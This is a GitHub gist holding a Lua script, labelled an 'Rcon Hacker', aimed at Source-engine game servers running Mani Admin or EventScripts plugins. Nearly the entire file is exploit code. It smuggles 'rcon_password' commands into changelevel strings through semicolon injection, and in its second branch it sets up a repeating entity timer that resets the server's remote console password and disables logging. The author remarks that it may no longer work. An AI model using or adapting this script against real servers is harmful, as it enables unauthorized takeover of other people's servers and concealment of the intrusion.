Created
November 2, 2020 19:31
-
-
Save notmike101/6ef00bf2afb8401e60c8996b30fb243a to your computer and use it in GitHub Desktop.
Mani Admin Rcon "Hacker"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-- This is old, probably doesn't work anymore | |
if args=="es" then | |
for x=1,50 do | |
cmd('"changelevel ""ma_say;rcon_password lolololz"') | |
wait(10) | |
cmd('"changelevel 1""ma_say;rcon_password lolololz"') | |
wait(10) | |
cmd('"changelevel ""ma_psay;rcon_password lolololz"') | |
wait(10) | |
cmd('"changelevel 2""ma_psay;rcon_password lolololz"') | |
wait(10) | |
cmd('"changelevel ""ma_help;rcon_password lolololz"') | |
wait(10) | |
cmd('"changelevel 3""ma_help;rcon_password lolololz"') | |
wait(10) | |
cmd('"changelevel ""ma_admin;rcon_password lolololz"') | |
wait(10) | |
cmd('"changelevel 4""ma_admin;rcon_password lolololz"') | |
wait(10) | |
cmd('"changelevel ""es_version;rcon_password lolololz"') | |
wait(10) | |
cmd('"changelevel 5""es_version;rcon_password lolololz"') | |
wait(10) | |
cmd('"changelevel "";rcon_password lolololz"') | |
wait(10) | |
cmd('"changelevel 6"";rcon_password lolololz"') | |
wait(10) | |
end | |
elseif args=="cheats" then | |
cmd("ent_create logic_timer") | |
wait(100) | |
cmd('ent_fire logic_timer addoutput "targetname taketimer"') | |
wait(100) | |
cmd("ent_fire taketimer toggle") | |
wait(100) | |
cmd('ent_fire taketimer addoutput "refiretime 0.01"') | |
wait(100) | |
cmd("ent_fire taketimer enable") | |
wait(100) | |
cmd('ent_fire taketimer addoutput "startdisabled 0"') | |
wait(100) | |
cmd('ent_fire taketimer addoutput "UseRandomTime 0"') | |
wait(100) | |
cmd("ent_fire point_servercommand kill") | |
wait(100) | |
cmd("give point_servercommand") | |
wait(100) | |
cmd("ent_setname point_clientcommand point_servercommand") | |
wait(100) | |
cmd('ent_fire taketimer addoutput "ontimer point_servercommand,command,rcon_password lolololz"') | |
wait(100) | |
cmd('ent_fire taketimer addoutput "ontimer point_servercommand,command,log 0"') | |
end | |
wait(100) | |
cmd('rcon_password lolololz') | |
wait(100) | |
cmd('echo "Your rcon access is"') | |
wait(100) | |
cmd('rcon "echo Full Access"') | |
wait(100) | |
cmd('echo "Made By MikE"') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment